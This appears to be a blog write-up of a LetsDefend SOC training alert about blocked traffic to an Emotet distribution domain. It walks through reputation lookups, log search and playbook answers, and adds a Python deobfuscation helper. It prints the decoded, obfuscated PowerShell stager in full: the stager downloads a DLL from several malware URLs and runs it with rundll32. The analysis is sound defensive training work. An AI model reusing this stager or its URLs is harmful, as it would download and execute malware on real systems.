LetsDefend level 1 alert SOC111 - Traffic to Malware Domain event-id 42
Details
EventID: 42
Event Time: Jan. 30, 2021, 5:25 p.m.
Rule: SOC111 - Traffic to Malware Domain
Level: Security Analyst
Source Address 172.16.17.19
Source Hostname BellaPRD
Destination Address 45.80.181.51
Destination Hostname casinos-hub[.]com
Username Bella
Request URL http[:]//casinos-hub.com/s/ZQhDyLF/
User Agent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
Device Action Blocked
playbook
Search Log
First, check the destination IP address.
45.80.181.51
VirusTotal: https://www.virustotal.com/gui/ip-address/45.80.181.51
ip-sc : https://ip-sc.net/ja/r/45.80.181.51
It is an IP in Singapore that is not specifically flagged as a threat.
The domain, however, is a different story:
casinos-hub[.]com
VirusTotal: https://www.virustotal.com/gui/domain/casinos-hub.com
URLhaus: https://urlhaus.abuse.ch/url/972700/
Emotet!
urlscan.io: https://urlscan.io/result/9df2f694-639e-4f89-99d6-48ef765c4cb7/
So a "casino hub"(?) was apparently distributing Emotet. In other words, this is the "Traffic to Malware Domain" of this alert.
I could not tell what happens after connecting there.
Log search - 45.80.181.51
# | DATE | TYPE | SOURCE ADDRESS | SOURCE PORT | DESTINATION ADDRESS | DESTINATION PORT |
---|---|---|---|---|---|---|
335 | Jan, 30, 2021, 05:25 PM | Proxy | 172.16.17.19 | 13212 | 45.80.181.51 | 80 |
The log contains only the access from the time the alert was raised.
URL: http://casinos-hub.com/s/ZQhDyLF/ Device Action: Blocked
Analyze URL Address
Since we already found out above that it is Emotet,
Answer :Malicious
Has Anyone Accessed IP/URL/Domain?
The access was blocked.
Device Action Blocked
Answer: Not Accessed
Add Artifacts
Value | Type | Comment |
---|---|---|
45.80.181.51 | IP Address | casinos-hub[.]com in Singapore |
http[:]//casinos-hub.com/s/ZQhDyLF/ | URL Address | emotet download |
Incidentally,
Endpoint - BellaPRD
In the Process History, execution of a suspicious PowerShell script was seen.
powershell -w hidden -enc <base64-encoded command omitted>
-> base64 decode
seT-ITEm ('VARiAB'+'LE:'+'UeB5p') ( [TyPe]("{0}{4}{5}{2}{1}{3}{6}"-F 's','di','O.','rEct','YsTE','M.i','Ory')); $Xv05be = [tYPE]("{4}{1}{3}{5}{6}{0}{2}{7}" -f 'icEpoin','n','TmaNA','e','sYsTem.','T.S','eRV','GeR') ; $Pudbt67=$H_9J + [char](33) + $H07L;$D19Q=('Z'+('18'+'F')); (VaRIaBLe ('ueB5'+'p') -vALuEO )::"Cr`e`A`TE`dIrecTOry"($HOME + ((('Z7'+'B'+'Aa7jfxj')+'Z'+('7B'+'Pwqr'+'3d'+'0Z7')+'B')."re`pLAce"(('Z7'+'B'),'\')));$D04E=('T2'+'8X'); ( cHilDITEm ("v"+"ArIaBLE:XV"+"0"+"5Be") ).VaLUe::"S`ECURiT`YPR`oto`COL" = ('T'+('ls'+'12'));$F67O=('N'+('26'+'J'));$V8xjubf = ('E'+('4'+'0T'));$G2_P=('L1'+'0L');$Ytn2v6z=$HOME+(('{'+'0'+'}A'+'a7jfxj{0}P'+'wqr3d0{'+'0}') -f [ChaR]92)+$V8xjubf+'.d' + 'll';$K87N=('D'+('3'+'8V'));$Vez3jmc='h' + 'tt' + 'p';$Ukeknom=(('sg'+' yw a')+('h:/'+'/y')+('ah'+'yal')+'is'+('a'+'yam.')+('com/sy'+'s-c'+'ac')+'he'+('/tAsw/!'+'s'+'g')+(' y'+'w ah:')+('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')+('QhDy'+'LF/!'+'sg y')+('w'+' ah://d'+'eodi')+('ta'+'s')+('.c'+'o')+('m'+'/n/FUE')+('yoG/!s'+'g ')+('yw '+'ah')+(':/'+'/m'+'ts2019-00')+'2-'+'si'+('te'+'9.gte'+'mp')+('u'+'rl.c')+'om'+('/w'+'p')+'-'+'co'+('nt'+'ent/E'+'/')+'!'+'s'+'g'+(' yw '+'ah'+'s://')+'o'+('ce'+'an4gamer'+'s.'+'co')+('m'+'/wp-co')+('n'+'tent/GA')+('uY'+'f/')+'!'+('sg '+'yw ')+('ah://acad'+'emi'+'a')+('pr'+'ogr'+'e')+'so'+('.'+'c'+'om/cg')+('i'+'-b')+('in/Z5/'+'!'+'sg'+' ')+('yw'+' ahs'+':/')+('/newto'+'p'+'.one')+('/r'+'es')+('p'+'onsive')+('s'+'/z/'))."r`EpLA`ce"((('sg'+' ')+'y'+('w '+'ah')),([array]('nj','tr'),'yj','sc',$Vez3jmc,'wd')[3])."spl`IT"($P53W + $Pudbt67 + $W64N);$V16S=('P'+('31'+'L'));foreach ($Oppvsjc in $Ukeknom){try{(&('N'+'ew-Obje'+'ct') SysTem.net.WEBClIENT)."dOW`Nl`Oadf`ile"($Oppvsjc, $Ytn2v6z);$E82E=('V'+('6'+'_O'));If ((&('Get'+'-I'+'tem') $Ytn2v6z)."le`NgTh" -ge 41385) {.('rund'+'l'+'l32') $Ytn2v6z,(('A'+'nySt')+'r'+('i'+'ng'))."T`os`TRiNg"();$Q_7W=('Y1'+'2O');break;$S41O=('E'+('0'+'0F'))}}catch{}}$D38Z=(('H1'+'6')+'Q')
Looking at the contents,
('//cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')
access to casinos-hub.com can be seen. Execution of this script is what relates to this alert. I could not tell what caused it to be executed.
Looking at the other logs on the Endpoint, there are logs after this point, but there are no logs before it, so the earlier activity is unknown. This sort of thing is usually a VBA macro, I suppose.
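As an added triage example (my own helper code, not LetsDefend's and not the script above), the following decodes a `-enc` argument and statically undoes the two obfuscation tricks visible in the decoded script: the `'a'+'b'` string concatenation and the `("{1}{0}" -f 'b','a')` format operator. The replace token `sg yw ah`, the scheme `http` and the separator `!` are the values read off the script above and are passed in as parameters, since each build uses different ones; the embedded sample is constructed, with one URL fragment from the alert and one placeholder domain.

```python
"""Static deobfuscation helpers for a `powershell -w hidden -enc ...` finding.
Added example code, not LetsDefend's; all names below are our own."""
import base64
import re

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")   # 'a'+'b'
_PAREN = re.compile(r"\(\s*'([^']*)'\s*\)")             # ('abc')
_FORMAT = re.compile(                                   # ("{1}{0}" -f 'b','a')
    r"""\(\s*"((?:\{\d+\})+)"\s*-[fF]\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""")


def decode_enc(encoded: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script."""
    return base64.b64decode(encoded).decode("utf-16le")


def collapse_concats(script: str) -> str:
    """Join adjacent literals and drop parentheses around a lone literal
    until nothing changes. Does not handle '' quote escapes inside strings."""
    prev = None
    while prev != script:
        prev = script
        script = _CONCAT.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", script)
        script = _PAREN.sub(lambda m: f"'{m.group(1)}'", script)
    return script


def resolve_formats(script: str) -> str:
    """Apply PowerShell's -f operator statically; its {n} placeholders pick
    positional arguments exactly like Python's str.format."""
    def apply(m: re.Match) -> str:
        args = re.findall(r"'([^']*)'", m.group(2))
        return "'" + m.group(1).format(*args) + "'"
    return _FORMAT.sub(apply, script)


def deobfuscate(script: str) -> str:
    return collapse_concats(resolve_formats(collapse_concats(script)))


def extract_urls(script: str, token: str = "sg yw ah",
                 scheme: str = "http", sep: str = "!") -> list[str]:
    """Undo the .replace(token, scheme).split(sep) step of the downloader."""
    urls = []
    for lit in re.findall(r"'([^']*)'", deobfuscate(script)):
        if token in lit:
            parts = lit.replace(token, scheme).split(sep)
            urls += [p.strip() for p in parts if p.strip().startswith("http")]
    return urls


# Constructed sample in the style of the decoded script: one URL fragment
# taken from the alert, the other a placeholder domain.
SAMPLE = ("$Ukeknom=(('sg'+' yw a')+('h:/'+'/cas'+'i'+'nos-h'+'ub'+'.co'+'m/s/'+'Z')"
          "+('QhDy'+'LF/!'+'sg y')+('w'+' ahs://e'+'xample.inv')+('alid/x/'))")
```

Running `extract_urls(SAMPLE)` yields the defanged-ready URL list that goes into the Add Artifacts step.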
End
I could not determine how the PowerShell that downloaded Emotet came to be executed, but it was interesting to get a rough picture of the chain leading up to the alert, rather than having the alert stand entirely on its own.
Still, if possible, I would like the events before and after to be kept as Endpoint logs and the like as well.
Though perhaps it is not done because keeping and generating such a large volume of logs is difficult.